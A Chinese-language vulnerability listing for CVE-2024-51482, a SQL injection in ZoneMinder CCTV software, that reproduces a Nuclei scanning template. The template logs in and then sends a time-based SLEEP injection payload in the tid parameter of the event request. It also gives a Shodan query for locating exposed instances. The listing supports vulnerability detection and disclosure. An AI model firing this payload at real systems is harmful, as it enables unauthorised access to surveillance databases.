CVE-2024-51482: ZoneMinder v1.37.* <= 1.37.64 - SQL Injection

日期: 2025-08-01 | 影响软件: ZoneMinder | POC: 已公开

漏洞描述

ZoneMinder is a free, open source closed-circuit television software application. ZoneMinder v1.37.* <= 1.37.64 is vulnerable to boolean-based SQL Injection in function of web/ajax/event.php. This is fixed in 1.37.65.

PoC代码[已公开]

id: CVE-2024-51482

info:
  name: ZoneMinder v1.37.* <= 1.37.64 - SQL Injection
  author: ritikchaddha
  severity: critical
  description: |
    ZoneMinder is a free, open source closed-circuit television software application. ZoneMinder v1.37.* <= 1.37.64 is vulnerable to boolean-based SQL Injection in function of web/ajax/event.php. This is fixed in 1.37.65.
  reference:
    - https://securityonline.info/zoneminders-cve-2024-51482-a-10-10-severity-vulnerability-exposes-sql-databases/
    - https://github-production-user-asset-6210df.s3.amazonaws.com/104687644/381894613-3cc50e51-68cf-4540-8225-4288f73e0c08.mp4?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAVCODYLSA53PQK4ZA%2F20241129%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20241129T074108Z&X-Amz-Expires=300&X-Amz-Signature=9cc5b01b0482cbd5573c223a1d44e9ffed10afd7d042d76e8308dfcf3bb7e8a5&X-Amz-SignedHeaders=host
    - https://nvd.nist.gov/vuln/detail/CVE-2024-51482
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 9.9
    cve-id: CVE-2024-51482
    cwe-id: CWE-89
    epss-score: 0.45591
    epss-percentile: 0.9754
    cpe: cpe:2.3:a:zoneminder:zoneminder:*:*:*:*:*:*:*:*
  metadata:
    max-request: 4
    vendor: zoneminder
    product: zoneminder
    shodan-query: title:"ZoneMinder"
  tags: cve,cve2024,zoneminder,sqli,authenticated

flow: http(1) && http(2) && http(3)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    host-redirects: true
    matchers:
      - type: word
        part: body
        words:
          - "ZoneMinder</a>"
          - "ZoneMinder Login</h1>"
          - "<title>ZoneMinder"
        condition: or
        internal: true

  - raw:
      - |
        POST /zm?view=login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=login&postLoginQuery=&username={{username}}&password={{password}}

      - |
        GET /zm/index.php?view=request&request=event&action=removetag&tid=1 HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "{\"result\":\"OK")'
        internal: true

  - raw:
      - |
        @timeout: 30s
        GET /zm/index.php?view=request&request=event&action=removetag&tid=1+AND+(SELECT+6435+FROM+(SELECT(SLEEP(7)))AbUy) HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'duration>=7'
          - 'status_code == 200'
        condition: and
# digest: 4a0a00473045022100e6a35c972141e026a5b8ddce639a909dd3f9e250b4400526c02779d333da8d09022079598cbf6a8452a80a4d012785d5aed6166d3948b7b5b80cb1655ea920cfff16:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2024/CVE-2024-51482.yaml

相关漏洞推荐